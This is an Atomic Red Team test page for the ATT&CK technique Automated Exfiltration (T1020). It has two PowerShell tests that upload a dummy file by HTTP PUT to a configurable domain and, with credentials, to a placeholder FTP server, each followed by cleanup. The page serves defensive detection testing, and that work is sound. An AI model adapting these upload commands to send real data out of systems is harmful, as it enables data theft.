# T1020 - Automated Exfiltration
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1020)
<blockquote>

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) 

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).

</blockquote>

## Atomic Tests

- [Atomic Test #1 - IcedID Botnet HTTP PUT](#atomic-test-1---icedid-botnet-http-put)

- [Atomic Test #2 - Exfiltration via Encrypted FTP](#atomic-test-2---exfiltration-via-encrypted-ftp)


<br/>

## Atomic Test #1 - IcedID Botnet HTTP PUT
Creates a text file
Tries to upload to a server via HTTP PUT method with ContentType Header
Deletes a created file

**Supported Platforms:** Windows


**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file | Exfiltration File | string | C:&#92;temp&#92;T1020_exfilFile.txt|
| domain | Destination Domain | url | https://google.com|


#### Attack Commands: Run with `powershell`! 


```powershell
$fileName = "#{file}"
$url = "#{domain}"
$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
$contentType = "application/octet-stream"
try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
```

#### Cleanup Commands:
```powershell
$fileName = "#{file}"
Remove-Item -Path $fileName -ErrorAction Ignore
```





<br/>
<br/>

## Atomic Test #2 - Exfiltration via Encrypted FTP
Simulates encrypted file transfer to an FTP server. For testing purposes, a free FTP testing portal is available at https://sftpcloud.io/tools/free-ftp-server, providing a temporary FTP server for 60 minutes. Use this service responsibly for testing and validation only.

**Supported Platforms:** Windows


**auto_generated_guid:** 5b380e96-b0ef-4072-8a8e-f194cb9eb9ac





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sampleFile | Path of the sample file to exfiltrate. | String | C:&#92;temp&#92;T1020__FTP_sample.txt|
| ftpServer | FTP server URL. | Url | ftp://example.com|
| credentials | FTP server credentials. | String | [user:password]|


#### Attack Commands: Run with `powershell`! 


```powershell
$sampleData = "Sample data for exfiltration test"
Set-Content -Path "#{sampleFile}" -Value $sampleData
$ftpUrl = "#{ftpServer}"
$creds = Get-Credential -Credential "#{credentials}"
Invoke-WebRequest -Uri $ftpUrl -Method Put -InFile "#{sampleFile}" -Credential $creds
```

#### Cleanup Commands:
```powershell
Remove-Item -Path "#{sampleFile}" -ErrorAction Ignore
```





<br/>